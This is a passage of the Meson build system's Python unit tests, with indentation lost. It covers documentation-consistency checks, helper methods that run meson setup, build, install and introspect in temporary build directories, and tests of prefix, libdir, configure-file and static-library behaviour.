self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
errors = []  # type: T.List[T.Tuple[Path, Exception]]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown file in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
class BasePlatformTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
self.prefix = '/usr'
self.libdir = 'lib'
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path; otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs, CI will just abort and it is very hard to
# distinguish between a CI issue and a test bug in that case. Set a
# timeout and fail loudly instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix,
'--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# use them as the command for each compile command in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list of command lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
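# Helper: write in_data to a temp file, run do_conf_file() on it, and
# return the configured output so newline handling can be checked exactly.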
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
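# The three variable_format values select the syntax being substituted:
# 'meson' handles #mesondefine and @VAR@, 'cmake' handles #cmakedefine
# and ${VAR}, 'cmake@' handles #cmakedefine and @VAR@.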
def check_formats(confdata, result):
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
confdata = ConfigurationData()
# Key errors, as the variables do not exist yet
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False,'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True,'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value','description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10,'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple string with cmake formats
confdata.values = {'VAR': ('value','description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'),'#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'),'#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'),'#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'),'#define VAR xxx value yyy value')
# Error handling for malformed lines and unknown formats
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR'], confdata, 'cmake@')
# Dict value in confdata
confdata.values = {'VAR': (['value'],'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
